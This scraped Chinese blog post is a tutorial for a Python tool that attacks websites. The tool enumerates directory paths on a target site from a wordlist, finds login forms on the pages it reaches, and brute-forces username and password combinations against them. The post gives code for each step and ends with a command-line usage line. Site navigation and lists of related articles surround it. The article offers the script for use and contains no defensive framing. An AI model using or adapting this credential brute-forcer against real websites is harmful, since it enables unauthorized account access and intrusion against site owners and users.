首页
所有分类
TAGS
文字工具 EMOJI BIBLE
编程 Python

python遍历路径破解表单的示例

Posted in Python onNovember 21, 2020

首先是利用python遍历路径,采用字典爆破的形式,当然如果只是单纯的爆破路径,简单写一个多线程脚本就行了。这里考虑如何对爆破到的路径进行第二步利用,此处尝试对猜解到的路径进行表单发现及登陆爆破处理。

​首先就是路径爆破,采用多线程队列,爆破路径,判断形式为200响应码。

while not self._queue.empty():
      queue = self._queue.get(timeout=0.5)
      try:
        r = requests.get(self.url+queue,timeout=5, headers=self.headers)
        if r.status_code == 200:
          print "[200] %s" %(queue)
          soup = BeautifulSoup(r.content,'html.parser')
          if soup.find('form'):
            self.brute(soup, queue)

猜解到路径后交给brute方法处理,方法实现了一个css选择器,获取form表单中的input字段标签,提取标签参数组合成post参数值,然后提取表单中的action跳转页面,如没有页面默认在当前表单页提交。

input = soup.select("form input")
      for i in input:
        try:
          if i.attrs['type'] == "hidden":
            name, value = i.attrs['name'], i.attrs['value']
            list_post.append(name+'='+value)
          elif i.attrs['type'] == 'password':
            name = i.attrs['name']
            list_post.append(name+'=$$$')
          else:
            name = i.attrs['name']
            list_post.append(name+'=%%%')
        except:
          continue
      for i in list_post:
        post = post + i + '&'
      action = soup.find_all('form')
      for i in action:
        if i['action']:
          actiontag = i['action']
        else:
          actiontag = queue
      self.payload(post, actiontag)

获取参数值后,交给payload方法处理登陆,采用requests库的session登陆。获取cookie,先采用session请求获取cookie后,再采用session携带cookie进行请求提交。然后对输入的验证值进行判断是否为登陆成功。

for name in self.username():
      post_user = post.replace('%%%',name.strip())
      for pwd in self.password():
        post_pwd = post_user.replace('$$$',pwd.strip())
        session = requests.Session()
        session.get(self.url+'/'+action, headers=self.headers, verify=False)
        r = session.post(self.url+'/'+action, data=post_pwd, headers=self.headers, verify=False)
        if self.word in r.content:
          print '[username] %s' %name +'\r' + '[password] %s' %pwd
          return

为了判断是否登陆成功,采用的人为输入判断字符串的形式。也就是脚本执行形式为

python xxx.py http://xxxx.com xxxxx

以上就是python遍历路径破解表单的示例的详细内容,更多关于python 破解表单的资料请关注三水点靠木其它相关文章!

python遍历路径破解表单的示例

- Author -

Misaki''s

声明:登载此文出于传递更多信息之目的,并不意味着赞同其观点或证实其描述。

Python 相关文章推荐
python的绘图工具matplotlib使用实例
Jul 03 Python
python服务器端收发请求的实现代码
Sep 29 Python
详解Python装饰器由浅入深
Dec 09 Python
pygame游戏之旅 添加游戏界面按键图形
Nov 20 Python
pandas DataFrame 交集并集补集的实现
Jun 24 Python
使用Python画股票的K线图的方法步骤
Jun 28 Python
Django框架模型简单介绍与使用分析
Jul 18 Python
python画蝴蝶曲线图的实例
Nov 21 Python
python print 格式化输出,动态指定长度的实现
Apr 12 Python
python 使用事件对象asyncio.Event来同步协程的操作
May 04 Python
详解python命令提示符窗口下如何运行python脚本
Sep 11 Python
Python 绘制多因子柱状图
May 11 Python
Python如何批量生成和调用变量
Nov 21 #Python
在终端启动Python时报错的解决方案
Nov 20 #Python
python 批量下载bilibili视频的gui程序
Nov 20 #Python
Python ellipsis 的用法详解
Nov 20 #Python
python 动态渲染 mysql 配置文件的示例
Nov 20 #Python
Python paramiko使用方法代码汇总
Nov 20 #Python
分享一枚pycharm激活码适用所有pycharm版本我的pycharm2020.2.3激活成功
Nov 20 #Python
比利时购物网站(33) 瑞典购物网站(55) 澳大利亚购物网站(309) 丹麦购物网站(22) 肯尼亚购物网站(2) 意大利购物网站(128) 阿根廷购物网站(9) 挪威购物网站(7) 台湾购物网站(77) 法国购物网站(144)
You might like
360通用php防护代码(使用操作详解)
2013/06/18 PHP
关于PHP内存溢出问题的解决方法
2013/06/25 PHP
Laravel如何使用Redis共享Session
2018/02/23 PHP
PHP工厂模式、单例模式与注册树模式实例详解
2019/06/03 PHP
用htc组件制作windows选项卡
2007/01/13 Javascript
(推荐一个超好的JS函数库)S.Sams Lifexperience ScriptClassLib
2007/04/29 Javascript
超级简单实现JavaScript MVC 样式框架
2015/03/24 Javascript
javascript实现控制浏览器全屏
2015/03/30 Javascript
JavaScript实现Base64编码转换
2016/04/23 Javascript
jQuery中on绑定事件后引发的事件冒泡问题如何解决
2016/05/25 Javascript
JS实现类似百叶窗下拉菜单效果
2016/12/30 Javascript
react native仿微信PopupWindow效果的实例代码
2017/08/07 Javascript
Vue.js移动端左滑删除组件的实现代码
2017/09/08 Javascript
angularjs实现猜大小功能
2017/10/23 Javascript
vue中简单弹框dialog的实现方法
2018/02/26 Javascript
浅谈ElementUI中switch回调函数change的参数问题
2018/08/24 Javascript
js实现点击展开隐藏效果(实例代码)
2018/09/28 Javascript
基于vue的tab-list类目切换商品列表组件的示例代码
2020/02/14 Javascript
jQuery HTML设置内容和属性操作实例分析
2020/05/20 jQuery
JS实现多功能计算器
2020/10/28 Javascript
[02:28]DOTA2亚洲邀请赛附加赛 RECAP赛事回顾
2015/01/29 DOTA
Python采用socket模拟TCP通讯的实现方法
2014/11/19 Python
详解Python的迭代器、生成器以及相关的itertools包
2015/04/02 Python
介绍Python中内置的itertools模块
2015/04/29 Python
用ReactJS和Python的Flask框架编写留言板的代码示例
2015/12/19 Python
不要用强制方法杀掉python线程
2017/02/26 Python
python的mysqldb安装步骤详解
2017/08/14 Python
python各类经纬度转换的实例代码
2019/08/08 Python
详解pandas绘制矩阵散点图(scatter_matrix)的方法
2020/04/23 Python
python 获取谷歌浏览器保存的密码
2021/01/06 Python
Python 内存管理机制全面分析
2021/01/16 Python
大学毕业登记表自我鉴定
2013/10/09 职场文书
2014学习全国两会精神心得体会2000字
2014/03/11 职场文书
杭州黄龙洞导游词
2015/02/10 职场文书
医学生自荐信范文
2015/03/05 职场文书
PHP判断是否是json字符串
2021/04/01 PHP